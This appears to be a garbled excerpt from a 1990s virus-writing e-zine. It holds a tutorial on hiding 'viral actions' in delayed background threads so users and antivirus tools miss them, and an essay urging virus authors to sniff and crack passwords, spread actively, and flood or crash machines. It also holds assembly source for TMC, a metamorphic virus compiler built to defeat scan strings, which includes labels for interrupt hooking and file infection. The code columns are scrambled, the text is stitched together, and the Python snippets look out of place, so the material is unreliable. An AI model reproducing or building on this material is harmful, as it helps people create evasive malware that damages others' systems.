e) fdwCreate: Creation flags, 0 for a thread that starts running immediately. If u want to create the thread, but suspend committing CPU time to it, then pass CREATE_SUSPENDED. That thread will stay suspended until u call ResumeThread API.
f) lpThreadID: Must be valid address of a DWORD variable. ID of created thread will be stored there.
This API will create a new Win32 compatible thread. As output u will get a thread handle and a thread ID number. The handle, as any other handle, is valid only inside the process which created it; the ID number is valid in the whole system until the thread terminates.
Thread can be terminated by ExitThread or TerminateThread APIs:
Syntax:
void ExitThread (UINT fuExitCode);
This API will terminate the calling thread and set its exit code to fuExitCode.
Syntax:
BOOL TerminateThread (HANDLE hThread, UINT fuExitCode);
This API will terminate the thread identified by hThread handle. Unlike the previous API, it can terminate any thread, not only the calling one. But be careful! The terminated thread gets no chance to clean up, so if u terminate a thread which is writing to disk, it can cause damage to the system!
There r many other APIs for work with threads, but this article is more theoretical than practical. If u r really interested in threads and wanna know more about them, download Win32 SDK or contact me.
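To make the create/parameter/ID idea above more concrete, here is a small sketch, again in Python as a portable stand-in and not the real Win32 call. The helper create_thread is hypothetical: it only mimics the shape of CreateThread (start routine plus one parameter in, "handle" and ID out). In Python the Thread object plays the role of the handle and thread.ident plays the role of the thread ID.

```python
import threading


def create_thread(start_routine, param):
    """Hypothetical analog of CreateThread: returns (handle, thread_id)."""
    thread = threading.Thread(target=start_routine, args=(param,))
    thread.start()
    # ident is assigned once the thread has been started
    return thread, thread.ident


def demo():
    seen = []

    def thread_proc(param):
        # The new thread starts here and receives the parameter,
        # like lpvTParam passed to the thread function.
        seen.append((param, threading.get_ident()))

    handle, thread_id = create_thread(thread_proc, 0x12345678)
    handle.join()  # wait for the thread to finish before reading results
    return seen, thread_id
```

The thread function sees the same ID from inside (threading.get_ident) as the creator got back from create_thread, which matches the idea that the ID names the thread itself and not a particular handle to it.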
2. Synchronization
As I said some minutes before, thread synchronization is something really difficult, if not the most difficult thing. It is REALLY important to take special care of it. Becoz threads run separately and independently from other threads and u want to control all threads u created, u have to SYNCHRONIZE them. Remember this: do not synchronize threads by simple variables, rather use kernel synchronization objects!
Principle of synchronization: put the thread to sleep until another thread or another kernel object becomes signalised, which for a thread in simple words means: until that thread terminates (it ain't so simple as I said, but in this sample it's enough for u). When a thread is in sleep state, the system won't commit CPU time to it and so it won't slow the computer down. When a thread is not in sleep state, the system will commit CPU time to it.
Thread can suspend itself from getting CPU time until a kernel object becomes signalised (in our case, until a thread terminates). For that purpose there is one API in Win32 interface called WaitForSingleObject:
Syntax:
DWORD WaitForSingleObject (HANDLE hHandle, DWORD dwMilliseconds);
Parameters:
a) hHandle: Handle to kernel object.
b) dwMilliseconds: Number of milliseconds to wait. If u want to wait without time limit until the object becomes signalised, pass -1 (INFINITE) to this API.
Return values:
-1 (WAIT_FAILED) The function failed, u can get extended error code by calling GetLastError API.
0 (WAIT_OBJECT_0) Object has been signalised.
80h (WAIT_ABANDONED) Object is a mutex which was abandoned - the thread which owned it terminated without releasing it.
102h (WAIT_TIMEOUT) Object hasn't been signalised in the time specified by dwMilliseconds parameter.
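The waiting principle above can be tried out with a small sketch. It is written in Python as a portable stand-in, so the function wait_for_single_object below is a hypothetical helper that only imitates the timeout behaviour and two of the return codes of the real API for the "wait for a thread" case. It does not model WAIT_FAILED or WAIT_ABANDONED. The worker sleeps on a threading.Event, which stands in for a kernel synchronization object, instead of polling a variable.

```python
import threading

WAIT_OBJECT_0 = 0x000  # object was signalised
WAIT_TIMEOUT = 0x102   # time limit passed first
INFINITE = -1          # wait without time limit


def wait_for_single_object(thread, milliseconds):
    """Hypothetical analog of WaitForSingleObject for a thread 'handle'."""
    timeout = None if milliseconds == INFINITE else milliseconds / 1000.0
    thread.join(timeout)  # sleep here; no CPU time is burned while waiting
    return WAIT_TIMEOUT if thread.is_alive() else WAIT_OBJECT_0


def demo():
    release = threading.Event()  # synchronization object, not a flag variable
    worker = threading.Thread(target=release.wait)
    worker.start()

    first = wait_for_single_object(worker, 50)         # worker still blocked
    release.set()                                      # let the worker finish
    second = wait_for_single_object(worker, INFINITE)  # now it terminates
    return first, second
```

The first wait gives up after 50 milliseconds becoz the worker is still blocked on the event, the second one returns as soon as the worker terminates.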
3. Practice Ok, I hope u understood everything and if not, u will do so after some examples. The easiest, but the least efficent idea is: 1. Create new thread and make all viral actions inside it (see CreateThread API) 2. Sleep primary thread until primary thread will be finished (see WaitForSingleObject API) Example: ... push offset threadID push 0
;some action before ;where will be stored thread ID ;normal thread initialization
push push push push call
12345678h offset threadProc 0 0 CreateThread
;parameter for thread *) ;address of thread function ;normal stack - 1MB by default ;default security attributes ;create thread!
push eax
;parameter for CloseHandle **)
push -1 push eax call WaitForSingleObject
;wait until thread will be terminated ;handle of thread ;wait!
call CloseHandle
;close thread handle **)
...
;some action after this
threadID
dd
?
...
;variable needed by CreateThread API ;some code
threadProc: pushad mov eax, [esp+24h] ... popad ret
;new thread starts here ;store all registers ;get parameter passed to our thread *) ;some code ;restore all registers ;quit via undocumented way, no need to ;import ExitThread API
By this we will create new thread, wait for its termination and close its handle. Thread will store all registers, get parameter to EAX register, restore all registers (needed by RET) and terminate thread (and code above will be able to continue). Another idea, more efficent is: 1. Create new thread, wait some seconds and make all viral action inside it 2. Jump to host without waiting for thread termination Example: ... push push push push push push call
offset threadID 0 0 offset threadProc 0 0 CreateThread
push eax call CloseHandle
;some action before ;where will be stored thread ID ;normal thread initialization ;parameter for thread ;address of thread function ;normal stack - 1MB by default ;default security attributes ;create thread! ;handle of thread ;close thread handle
jmp dword ptr [origEntryPoint];jump to original EntryPoint threadProc: pushad
;thread starts here ;store all registers
push 10000 call Sleep
;10 000 milliseconds = 10 seconds ;wait 10 seconds
...
;some viral actions
popad ret
;restore all registers ;and quit
origEntryPoint dd
402000h
;saved original entrypoint
By this we will create new thread, close its handle and jump to host program. Thread will on the background suspend itself for 10 seconds (suspend thread from CPU time commiting), make some viral actions and terminate itself. We suspended our thread, becoz it will be less suspicious to user (virus won't slow down the system immediatelly).
All these algorithms r very simple and gives the AVs chance to trace them (everytime only one virus thread runs). It also ain't very good to create many threads where still only one will be alive (such as in my Win32.Leviathan). Much better idea is to run two or more threads "in the same" time, where one thread cannot run without second one (and that second one cannot run without third one and so on...). It makes the analysis much harder, if not impossible. The main idea is: let all threads be running and let operating system synchronize them (do not synchronize them manually, becoz AV will be able to emulate it - they aren't able to do that now, but I think they will do so after some months). Here is an algorithm: 1. Create two threads, primary thread will pass execution to host program 2. Let first thread make 50% of some action and second thread to make next 50% of action without synchronization 3. After everything is complete (when first thread will terminate itself, it will set flag. After two flags will be set ...), then create another two threads, where another halfs of actions will be done and terminate previous two threads. 4. Recursively do all of this until all viral actions will be done. This won't be so easy to trace (also not for u :D)... this is my idea of future working of viruses. I never coded virus using this algorithm, but I will do that. Now, it's only an idea...
Using Ring-X threads under Ring-0 Now u should know all important things about threads. All previous examples can work under all Win32 platformz - it's the most compatible way. I also wrote article about Ring-0 and Ring-3 threads under Ring-0, which will be published in 29A#4. From that time I didn't find anything new, so I haven't anything new to show ya here. I think it wouldn't be good to copy whole article here, becoz that article would be shit then. Please, wait for 29A#4 releasion and u will find there also that article. Thank you. Advantages of threads created from Ring-0: 1. 2. 3. 4.
Anti-Debug Anti-Heuristic Residency And much more...
Closin' I hope, that u enjoyed threads and that u will implement them in your next virus. If u didn't understand anything, then contact me at
[email protected] and I will help ya. Last greetingz goes to *-zine stuff, especially to Flush, Mgl and Navrhar for letting me publish this article. Good luck in coding guys! Benny / 29A, 1999
I agreed with Navrhar to write some real hard-core sci-fi about future of viruses that can be. I bring you some ideas that can be really good, if you can write 'em. I have no time left for it, Navrhar has no morale anymore for it. But all of them we solved already some time ago, but you should think about them for your own and you can be really smashing. Thats the reason I decided to write something about it: everyone is coding yetanother-poly-windows-pe-outlook-worm. Aren't you bored of it? All the time replicating some already present ideas? Don't you want to develop something really new. Here we have some ideas that are userfull and realiseable. Do it on your own...
Active internet/networking support Did you ever thing why the worms are so successful? Because users are now more sending a emails or uses internet instead of copying exe files to floppies for someone else. But current worms are really stupid. They just send themself to someone else (all of todays mail worms) and hopes there is some stupid user that will run it. Isn't it crazy? It something like writing in email: "send me to someone else, i'm a virus and i want to be spread". Stupid, isn't it? Do you really need a stupid users? You can do many things by your own. But you have to know how, of course. For this reason I recomend you to study a networking a bit, some easier protocols like http, ftp, smtp, telnet. Under windows you can do anything, you can filter 'em just like a real sniffer to get some passwords, you can also install a sniffer and filter all the traffic on your network. If you have some jokers in your hands you can start spreading oneself actively (not a passive as everyone does it now). You can install yourself on remote servers, you can map someone else's disks and infect them, you can infect pages on web-server by your own, you can take your future in your hands? So why you don't?
Self-optimizing performace Viruses are usualy stupid - they do the same things all the time. They, for example, infects like crazy, or will not notice that user is searching for them. But you can monitor all this, you can learn all this. How? Well, i've seen using neural network for nothing - just to be there - but it you are wise, you can use them for real, not wasting a space like someone else: you can learn how user acts on his computer, and you can notice then if he has some suspection, or what is he doing! Because your virus can self-optimize himself to do that. But not only neural nets are good for it - did you think about genetic model? Yeah, virus navrhar is ready for it, but do not performs it. Pitty. But you can create modular structure (each of them coresponded to one gene, for example) and ty supply a lot of other genes and let them optimize its own performace by Darwin's evolution in the wild. It can best show you how the virus should be coded to be good - because only good ones will surrive (you your code will be bug-free, of course). Be inventive - era of old viruses is in the past, to be best, you have to be dynamic, adaptive, protable, and wise.
Reentrable filetargets
It is easy to implement and is very effective - try to write all your infection routines reentrantely, so you can combine them any way: have you ever heard about exe file beeing infected, that was inserted as an attachment into word document (ole2 structure filesystem), that was compressed using zip, send over email, ascii armored with base64 encoding? It is simple, and very effective. Today it is still harder to find some suitable infection target, but it is so easy - if you can combine your access functions, you can call them whatever way you want, and you can easily do the important things. All is needed not to have a local variables fixed, but a dynamic. Go ahead...
Password hijacking It is very old technique, still used by hackers and still efective. You can usualy access password files. But they are one-way encrypted, and if you want to use some other accounts - for active inet support on some unix servers, for example, you need to know the passwords. So you can hack them. It can be done also for WinNT password file. Because passwords are one-way encrypted, and for verifying only a encrypted forms are compared, all you need is to test all the words you can imagine to encrypt it and to try if it matches. Then - goal, and you can do what you want as you know a password. But it tooks a lot of time. Well, if you are on some users machine, you are there for weeks or even months. You can use the time when user is not using cpu (which is usualy quite often) and test them like a hell. Also, you can use some password files. It is not possible to take some with you, as they ar usualy some megs long, but you can download them from the internet (easily using http protocol), or you can use some pages downloaded from internet and test all the words there - because users usualy sets a passwords simmilar to what they like. And they also browses pages what they like as well. So the password can be also on them like a regular word...
Multiplatform Last thing I want to mention is a multi-platform support. It is not yet fully supported at all. Navrhar virus and Anarchy does it in some way but not completely. Because there are many operating subsystems (call it this way) that gaves you opportunity to surrive. You can use them all to surf from onw target to another. For example, it is good to be an exe-virus, as you can do many things, but documents are mostly copied, instead of exe files. So you need a ole2 support to transfer itself elsewhere. But not only this. You can switch yourself to vbscript, to spread itself through html. And I can continue listing these features for some time as well, but you can guess some by your own, don't you?
Community born to communicate Everyone thinks about virus like a single entity. But it isn't, in nowadays world when all is connected to be able to communicate, so why viruses don't? Why not to use active copies of viruses to communicate through internet to exchange userful infromations, genes, for example, or distrubute updates. If you can do this - it is no more single virus but a whole community that can do wonderfull things: for example couple of entities knows each other. If one of them dies, others will know about it - and they can brute-attack target machine to infect it, to flood it and to crash it (easy with win ;) A new horizonts are waiting, so don't be affraid and go straight ahead! Flush
Hello hello guys! I got an oportunity to show you some older my program known as TMC. It means Tiny Mutation Compiler - because it is a mutation compiler. My virii is not a hard-coded in fact but it is recompiled for each run by a compiler from a pseudo-code given. So every time it might looks different. And it looks different. The idea is very simple: there is no need to code large and av-proof decryptors just to permutate your own body. That what TMC does. But you can't change your body anyway you want. You need some rules, here in my sources, all virus instructions are enclosed in macro brackets whose generates a pseudo-code. It contains normal opcodes and some neccessary flags, instruction length and other info needed for linking (see my macros - they explain it all). For first generation a "starter" (first generation compiler) must be used, that is included too. In others, there is only a compiler core in file which is also permutated and encrypted pseudocode. To run virus, it must be compiled at first. Also used compiler is also written in pseudocode so it can be replicated too.
Compilation (btw: it is more like a linking than a compilation) is easy: instructions are placed whereever in compiled buffer, connected with jumps and conditional jumps (they are followed with 3xNOP for worst case of linking, as you know from one-pass compilation same as is here). If given chunk is a data or label, it is remembered in linker as a label. If it is a instruction that refers it (jump or memory access), a correct address is placed from linkere there. So instruction flow can be breaked at any point and memory-access addresses, jump address will differ a lot. And this is body permutation, as you can see: no scanstring can be choosed, because there is always risk of breaking instructions within scanstring, and any jumps may be placed there. And heuristic can't wait until it is whole compiled. Thats it. Enjoy my sources and be happy. ender Download source code of TMC:Level_6x9 here
STARTER.ASM
code
JMPS
jumps segment para public use16 'CODE' assume cs:code, ds:code org 100h EQU
0FFFFh
;pravdepodobnost na rozdelenie kodu
include macros.inc
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄ ; ÚÙÚÙ ; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ start: mov ds:out_block_ofs, offset out_block_table mov ds:data_relo_ofs, offset data_relo_table mov ds:jmp_relo_ofs, offset jmp_relo_table mov mov call mov call call mov jmp
si, offset src_startup bx, offset free compile si, offset src_vir compile link word ptr cs:[free + 2], offset free free ;³ ;³ ;³
ANALYZER
³; ³; ³;
;³ Input: SI - source ;³ BX - output ;³ Output: BX - end of code compile: cld mov xor next_in_block: add lodsb or jz cmp jae cmp jbe sub jmp code_cmd: cmp jnz mov jmp
di, offset in_block_table ax, ax
si, ax al, al end_in_block al, M_CODE code_cmd al, MAX_CODE_SIZE next_in_block al, MAX_CODE_SIZE next_in_block
al, M_STOP no_stop al, 0 next_in_block
no_stop: cmp jnz mov
al, M_BLOCK no_block ax, si
STARTER.ASM
dec stosw mov stosw mov jmp no_block: mov jmp end_in_block: lea shr shr mov xor stosw
ax ax, 0FFFFh ax, 2 next_in_block ;M_RELO & M_J* al, 2 next_in_block
ax, [di + (-(offset in_block_table))] ax, 1 ax, 1 cs:num_of_blocks, ax ax, ax
;³ ;³ ;³ mov mov jmp next_block: mov call shl shl add mov
COMPILER
³; ³; ³;
di, offset in_block_table si, [di] first_no_find
bp, cs:num_of_blocks rnd_max ax, 1 ax, 1 ax, offset in_block_table di, ax
next_search_block: add di, 4 mov si, [di] or si, si jnz no_last_block mov di, offset in_block_table mov si, [di] no_last_block: cmp jnz cmp jnz jmp
byte ptr ds:[si], M_STOP no_stoped di, ax next_search_block no_next_block
no_stoped: first_no_find: cmp jz
word ptr ds:[di+2], 0FFFFh no_jmp_constr
push mov mov stosb mov dec dec
di di, [di+2] al, 0e9h ax, bx ax ax
STARTER.ASM
sub stosw pop no_jmp_constr: next_inst: lodsb cmp jz
ax, di di
al, M_STOP no_next_inst
cmp ja
al, MAX_CODE_SIZE no_break
push mov call or pop jz
ax bp, JMPS rnd_max ax, ax ax no_last_but_end
no_break: cmp jz cmp jae cmp jbe sub
al, M_STOP no_next_inst al, M_CODE code_cmd1 al, MAX_CODE_SIZE no_sub_size_data al, MAX_CODE_SIZE
no_sub_size_data: xor cx, cx mov cl, al push di mov di, bx rep movsb mov bx, di pop di jmp next_inst code_cmd1: cmp jnz push mov mov dec dec stosw lodsw stosw mov pop jmp no_relo1: cmp jnz push mov mov
al, M_RELO no_relo1 di di, data_relo_ofs ax, bx ax ax
data_relo_ofs, di di next_inst
al, M_BLOCK no_block1 di di, out_block_ofs ax, bx
STARTER.ASM
stosw lodsw stosw mov cmp jnz
out_block_ofs, di ax, src_src no_put_src
push mov mov mov rep mov pop
si di, bx si, offset src cx, offset src_end - offset src movsb bx, di si
no_put_src: pop lodsb jmp no_block1: push mov mov stosw lodsw stosw mov pop mov add cmp jb inc inc jmp
di no_break ;M_J* ax di di, jmp_relo_ofs ax, bx
jmp_relo_ofs, di di ax [bx], al bx, 3 al, M_J_COND next_inst bx bx next_inst
no_last_but_end: mov [di+2], bx add bx, 3 no_next_inst: dec mov jmp
si [di], si next_block
no_next_block: ret ;³ ;³ ;³
JUMP RELOCATOR
³; ³; ³;
link: mov mov sub shr shr next_jmp_relo: lodsw
si, cx, cx, cx, cx,
offset jmp_relo_table jmp_relo_ofs si 1 1
STARTER.ASM
push lodsw push
ax
mov mov sub shr shr
si, cx, cx, cx, cx,
cx si offset out_block_table out_block_ofs si 1 1
next_jmp_in_out: cmp ax, [si + 2] jz jmp_found add si, 4 loop next_jmp_in_out int 3 mov
bp, 0DEEDh
push pop mov mov int mov int
cs ds dx, offset jump_not_found ah, 9 21h ah, 4ch 21h
jmp_found: mov pop pop mov cmp jb sub inc push sub dec cmp jg cmp jl mov inc mov mov pop jmp over_jmp: pop dec xor inc mov inc mov
dx, [si] si cx bx al, [bx] al, M_J_COND jmp1 byte ptr [bx], 0F0h - 070h bx dx dx, bx dx dx, 127 over_jmp dx, -128 over_jmp [bx], dl bx word ptr [bx], 09090h byte ptr [bx+2], 090h dx next_j_relo
dx bx byte ptr [bx], 1 bx byte ptr [bx], 3 bx al, 0E9h
jmp1: mov
byte ptr [bx], al
STARTER.ASM
inc sub dec dec mov next_j_relo: loop
bx dx, bx dx dx [bx], dx
next_jmp_relo ;³ ;³ ;³
mov mov sub shr shr
si, cx, cx, cx, cx,
DATA RELOCATOR
³; ³; ³;
offset data_relo_table data_relo_ofs si 1 1
next_data_relo: lodsw push ax lodsw push cx si mov mov sub shr shr
si, cx, cx, cx, cx,
offset out_block_table out_block_ofs si 1 1
next_data_in_out: cmp ax, [si + 2] jz found add si, 4 loop next_data_in_out int 3 mov
bp, 0DEADh
push pop mov mov int mov int
cs ds dx, offset data_not_found ah, 9 21h ah, 4ch 21h
mov pop pop sub mov loop
ax, [si] si cx bx ax, offset free [bx], ax next_data_relo
found:
ret
rnd: push in
cx al, 40h
STARTER.ASM
mov mov in ror xor mov pop ret last_rnd
ah, al cl, al al, 40h ax, cl ax, cs:last_rnd cs:last_rnd, ax cx
dw
0DEADh
rnd_max:
;
or jz push call mov xor div xchg pop ret
bp, bp rnd_max_0 dx rnd ax, 1 dx, dx bp ax, dx dx
rnd_max_0: xor ret
ax, ax
num_of_blocks out_block_ofs data_relo_ofs jmp_relo_ofs
dw dw dw dw
0 0 0 0
data_not_found jump_not_found
db db
'Error in link data', 13, 10, '$' 'Error in link jump', 13, 10, '$'
include src\main.inc in_block_table: dd 100h out_block_table: dd 100h data_relo_table: dd 100h jmp_relo_table: dd 100h free: code
ends end
start
dup(?) dup(?) dup(?) dup(?)
COMPILER.INC
;DEBUG_SIZES = 1 @last_rnd @out_block_ofs @jump_relo_ofs @data_relo_ofs @num_of_blocks in_mem_ofs new_vir_size
EQU EQU EQU EQU EQU EQU EQU
2 4 6 8 0ah 0ch 0eh
@in_block_table @out_block_table @jump_relo_table @data_relo_table @free
EQU EQU EQU EQU EQU
0010h @in_block_table + 104h + 4 @out_block_table + 1B0h @jump_relo_table + 2e0h @data_relo_table + 188h
;³ ;³ ;³
ANALYZER
³; ³; ³;
I<
mov
word ptr es:[in_mem_ofs], 0
>
I< I< I<
mov mov mov
word ptr es:[@out_block_ofs], @out_block_table word ptr es:[@jump_relo_ofs], @jump_relo_table word ptr es:[@data_relo_ofs], @data_relo_table
> > >
I< RELO I< I<
lea src_src push mov JUMP
si, [bp + 1234h]
>
si bx, @free @compile
> >
BLOCK I< I<
@compile mov di, @in_block_table xor ax, ax JUMP @next_in_block
BLOCK I<
@next_in_block add si, ax CALLL read_byte or al, al _JZ @end_in_block cmp al, M_CODE _JAE @code_cmd cmp al, MAX_CODE_SIZE _JBE @next_in_block sub al, MAX_CODE_SIZE JUMP @next_in_block
I< I< I< I<
BLOCK I< I<
BLOCK I< I< I< I< I<
@code_cmd cmp al, M_STOP _JNZ @no_stop mov al, 0 JUMP @next_in_block @no_stop cmp al, M_BLOCK _JNZ @no_block mov ax, si dec ax stosw mov ax, 0FFFFh
> >
> > > > >
> >
> > > > >
COMPILER.INC
I< I<
stosw mov JUMP
> >
BLOCK I<
@no_block mov al, 2 JUMP @next_in_block
BLOCK I< ifdef I< endif I< I< I< I< I<
@end_in_block lea ax, [di + (-(@in_block_table))] DEBUG_SIZES int 3
>
shr shr mov xor stosw
> > > > >
ax, 2 @next_in_block ;M_RELO & M_J*
>
ax, 1 ax, 1 es:[@num_of_blocks], ax ax, ax
;³ ;³ ;³
COMPILER
³; ³; ³;
I< I<
mov mov JUMP
BLOCK I< I<
@next_block push bp mov bp, es:[@num_of_blocks] CALLL @rnd_max pop bp shl ax, 1 shl ax, 1 add ax, @in_block_table mov di, ax JUMP @next_search_block
I< I< I< I< I<
BLOCK I< I< I< I< I<
BLOCK I< I< I< I< I<
BLOCK I< I<
di, @in_block_table si, es:[di] @no_stoped
@next_search_block add di, 4 mov si, es:[di] or si, si _JNZ @no_last_block mov di, @in_block_table mov si, es:[di] JUMP @no_last_block @no_last_block push ax CALLL read_byte dec si cmp al, M_STOP pop ax _JNZ @no_stoped cmp di, ax _JNZ @next_search_block JUMP @no_next_block @no_stoped mov ax, es:[di+2] cmp ax, 0FFFFh _JZ @next_inst
>
> >
> > > > > > >
> > > > >
> > > > >
> >
COMPILER.INC
I< I< I< I< I< I< I< I< I< I<
push mov mov stosb mov dec dec sub stosw pop JUMP
BLOCK
@next_inst CALLL read_byte cmp al, M_STOP _JZ @no_next_inst
I<
di di, ax al, 0e9h ax, bx ax ax ax, di di @next_inst
> > > > > > > > > >
>
I<
cmp _JA
al, MAX_CODE_SIZE @no_break
>
I< I< I< RELO
push push mov @JMPS CALLL or pop pop _JZ JUMP
ax bp bp, [bp + 1234h]
> > >
I< I< I<
BLOCK I< I< I< I<
@rnd_max ax, ax bp ax @no_last_but_end @no_break
@no_break cmp al, M_STOP _JZ @no_next_inst cmp al, M_CODE _JAE @code_cmd1 cmp al, MAX_CODE_SIZE _JBE @no_sub_size_data sub al, MAX_CODE_SIZE JUMP @no_sub_size_data
BLOCK I< I< I< I<
@no_sub_size_data xor cx, cx mov cl, al push di mov di, bx JUMP @copy_next_byte
BLOCK
@copy_next_byte CALLL read_byte stosb dec cx _JNZ @copy_next_byte mov bx, di pop di JUMP @next_inst
I< I< I< I<
BLOCK I<
@code_cmd1 cmp al, M_RELO _JNZ @no_relo1
> > >
> > > >
> > > >
> > > >
>
COMPILER.INC
I< I< I< I< I< I< I< I< I<
push mov mov dec dec stosw CALLL stosw mov pop JUMP
di di, es:[@data_relo_ofs] ax, bx ax ax read_word es:[@data_relo_ofs], di di @next_inst
BLOCK I<
@no_relo1 cmp al, M_BLOCK _JNZ @no_block1
I< I< I< I<
push mov mov stosw CALLL stosw mov cmp _JNZ
I< I< I<
di di, es:[@out_block_ofs] ax, bx
es:[@out_block_ofs], di ax, src_src @no_put_src
push mov lea src_src mov rep mov pop JUMP
BLOCK I<
@no_put_src cmp ax, text_text _JNZ @no_put_text
I< I< RELO
mov cmp @JMPS _JAE CALLL sub mov add JUMP
BLOCK I< I< RELO I< I< I<
BLOCK
> > >
>
> > > >
read_word
I< I< I< RELO I< I< I< I<
I< I< I<
> > > > > >
> > >
si di, bx si, [bp + 1234h]
> > >
cx, offset src_end - offset src movsb bx, di si @no_special
> > > >
ax, NO_TEXT word ptr [bp + 1234h], ax @no_special read_byte al, MAX_CODE_SIZE ah, 0 si, ax @no_special
@no_put_text cmp ax, @JMPS _JNZ @no_special mov ax, [bp + 1234h] @JMPS dec ax cmp ax, MIN_JMPS _JAE jmps_no_over mov ax, MAX_JMPS JUMP jmps_no_over jmps_no_over
>
> >
> > >
> > > > >
COMPILER.INC
I< I< I<
mov add add JUMP
BLOCK I<
@no_special pop di CALLL read_byte JUMP @no_break
BLOCK I< I< I< I< I<
@no_block1 push ax push di mov di, es:[@jump_relo_ofs] mov ax, bx stosw CALLL read_word stosw mov es:[@jump_relo_ofs], di pop di pop ax mov es:[bx], al add bx, 3 cmp al, M_J_COND _JB @next_inst inc bx inc bx JUMP @next_inst
I< I< I< I< I< I< I< I< I<
es:[bx], ax bx, 2 si, 3 @no_special
> > >
>
;M_J* > > > > > > > > > > > > > >
BLOCK I< I<
@no_last_but_end mov es:[di+2], bx add bx, 3 JUMP @no_next_inst
> >
BLOCK I< I<
@no_next_inst dec si mov es:[di], si JUMP @next_block
> >
BLOCK I<
@no_next_block cmp word ptr es:[in_mem_ofs], 0 _JNZ @link pop si mov es:[in_mem_ofs], bx add si, offset src_vir - offset src_startup JUMP @compile
I< I< I<
;³ ;³ ;³
JUMP RELOCATOR
> > > >
³; ³; ³;
BLOCK I< I< I< I<
@link push pop sub mov
I< I< I< ifdef I<
mov si, @jump_relo_table mov cx, ds:[@jump_relo_ofs] sub cx, si DEBUG_SIZES ;check out_block in es:[4] int 3
es ds bx, @free ds:[new_vir_size], bx
> > > > > > > >
COMPILER.INC
endif I< I<
shr shr JUMP
cx, 1 cx, 1 @next_jump_relo
BLOCK I< I< I< I< I<
@next_jump_relo lodsw push ax lodsw push cx push si
I< I< I< I< I<
mov mov sub shr shr JUMP
BLOCK I<
@next_jmp_in_out cmp ax, [si + 2] _JZ @jmp_found add si, 4 dec cx _JNZ @next_jmp_in_out
I< I<
si, @out_block_table cx, ds:[@out_block_ofs] cx, si cx, 1 cx, 1 @next_jmp_in_out
ifdef I< I< endif
DEBUG mov int 3
BLOCK I< I< I< I< I< I<
@jmp_found mov dx, [si] pop si pop cx pop bx mov al, [bx] cmp al, M_J_COND _JB @jmp1
I< I< I< I< I< I<
sub inc push sub dec cmp _JG cmp _JL mov inc mov mov pop JUMP
I< I< I< I< I< I<
BLOCK I< I< I< I< I<
bp, 0DEEDh
byte ptr [bx], 0F0h - 070h bx dx dx, bx dx dx, 127 @over_jmp dx, -128 @over_jmp [bx], dl bx word ptr [bx], 09090h byte ptr [bx+2], 090h dx @next_j_relo
@over_jmp pop dx dec bx xor byte ptr [bx], 1 inc bx mov byte ptr [bx], 3
> >
> > > > > > > > > >
> > >
> >
> > > > > >
> > > > > > > > > > > >
> > > > >
I< I<
inc mov JUMP
bx al, 0E9h @jmp1
> >
BLOCK I< I< I< I< I< I<
@jmp1 mov inc sub dec dec mov JUMP
byte ptr [bx], al bx dx, bx dx dx [bx], dx @next_j_relo
> > > > > >
BLOCK I<
@next_j_relo dec cx _JNZ @next_jump_relo ;³ ;³ ;³
DATA RELOCATOR
>
³; ³; ³;
I< I< I< ifdef I< endif I< I<
mov si, @data_relo_table mov cx, ds:[@data_relo_ofs] sub cx, si DEBUG_SIZES int 3
> > >
shr shr JUMP
> >
BLOCK I< I< I< I< I<
@next_data_relo lodsw push ax lodsw push cx push si
I< I< I< I< I<
mov mov sub shr shr JUMP
BLOCK I<
@next_data_in_out cmp ax, [si + 2] _JZ @found add si, 4 dec cx _JNZ @next_data_in_out
I< I<
ifdef I< I< endif
DEBUG mov int 3
BLOCK I< I< I< I<
@found mov pop pop pop
cx, 1 cx, 1 @next_data_relo
si, @out_block_table cx, ds:[@out_block_ofs] cx, si cx, 1 cx, 1 @next_data_in_out
>
> > > > > > > > > >
> > >
bp, 0DEADh
> >
ax, [si] si cx bx
> > > >
I< I< I<
sub mov dec _JNZ JUMP
ax, @free [bx], ax cx @next_data_relo end_of_compile
> > >
MAIN.INC
;DEBUG = 1 START_JMPS NO_TEXT BAD_CLEAN MIN_JMPS MAX_JMPS
EQU EQU EQU EQU EQU
50 20 20 5 100
mem4compile ;
EQU
(8000d + @free) / 10h ^^^^ maximum size of the output code
@next_in_block @code_cmd @no_stop @no_block @end_in_block @next_block @next_search_block @no_last_block @no_stoped @next_inst @no_break @no_sub_size_data @code_cmd1 @no_relo1 @no_put_src @no_block1 @no_last_but_end @no_next_inst @no_next_block @next_jump_relo @next_jmp_in_out @jmp_found @over_jmp @jmp1 @next_j_relo @next_data_relo @next_data_in_out @found @rnd @rnd_max @rnd_max_0 @copy_next_byte @no_special @JMPS @no_put_text
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
3000 3001 3002 3003 3004 3005 3006 3007 3008 3009 3010 3011 3012 3013 3014 3015 3016 3017 3018 3019 3020 3021 3022 3023 3024 3025 3026 3027 3028 3029 3030 3050 3051 3052 3053
exit save_ds vir_size ofs_in_mem
EQU EQU EQU EQU
3054 3055 3056 3057
int24 no_inf_int24 end_of_compile _old_ip clean_ofajc _old_inst
EQU EQU EQU EQU EQU EQU
6000 6001 6002 6003 6004 6006
jmps_no_over
EQU
3061
crypt_data
EQU
3070
crypt_next_byte
EQU
3071
text_text
EQU
9000
xor_const xor_add save_ah
EQU EQU EQU
3031 3032 3033
read_byte read_word
EQU EQU
3040 3041
filetype old_cs old_ss old_ip old_sp exe_infect set_marker exe_header install old_entry infect
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
5000 5001 5002 5003 5004 5005 5006 5007 5008 5009 5010
min_mem max_mem old_max_mem write_exeh str_start prepare_str max_mem_FFFF infect_floppy no_drive_pressed infect_close handle path psp push_all pop_all int24_seg int24_ofs init_int24 deinit_int24 call_int21 infect_in_close infect_and_call_int21 exit_adr check4handle new_psp ticks no_short_exe no_com_ojeb
EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU EQU
5011 5012 5013 5014 5015 5016 5017 5018 5019 5020 5021 5022 5023 5024 5025 5026 5027 5028 5029 5030 5032 5033 5034 5035 5036 5037 5038 5039
@compile @link
EQU EQU
4000 4001
src_src int21 old21
EQU EQU EQU
1221 0200 0201
file_ok close no_inf
EQU EQU EQU
